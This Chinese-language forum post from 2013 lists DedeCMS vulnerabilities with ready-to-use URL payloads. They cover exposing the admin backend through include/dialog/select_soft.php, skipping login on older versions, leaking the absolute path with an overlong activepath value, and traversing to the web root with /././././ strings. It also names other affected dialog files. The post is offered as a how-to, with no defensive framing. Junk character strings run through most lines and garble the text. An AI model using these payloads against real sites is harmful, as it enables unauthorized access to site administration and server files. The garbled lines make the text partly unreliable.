1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
# M) r, R' s; _2 q1 a& z$ z* E/ S- l" s- e6 H' s. k
员帐号,新版本的就直接转向了后台.
d; J+ V: Q0 g+ d2 B5 e: B: P. w
5 m# @4 J, l6 U8 J. M3 k2.include/dialog/config.php会爆出后台管理路径0 |& X, `0 M5 A$ h8 _
' R/ m9 v& U* _# n" B3 R: }2 y3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录" X- i9 m! h+ z* C
0 w9 B* h: h$ o$ h9 M" G4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
# y" S1 F3 {$ Q$ e( y9 H" Q }% i$ n5 O
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉9 q& q- _3 k& `% S; \$ u: T
5 [5 F6 c% h% U. R% x到根目录去.不过这些版本的访问地址有些不同./ ~- ?$ c! D5 g$ I+ k" }
地址为require/dialog/select_soft.php?activepath=/././././././././9 E7 e( G5 y% K) t8 D( a
; N7 Z% @/ i3 _2 l/ C! L
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
+ p( o4 S3 |2 Z z9 [& Q' H存在相同问题的文件还有
0 D9 o9 d8 m0 v/ w d5 c+ pinclude\dialog\select_images.php7 s& U- l! |1 q8 G
include\dialog\select_media.php2 L4 l& V' y/ R- q' a0 B( L. G- j
include\dialog\select_templets.php" L7 u5 r9 E0 v. W( P# I
|
发表于 2013-4-16 16:50:43
收藏
支持
反对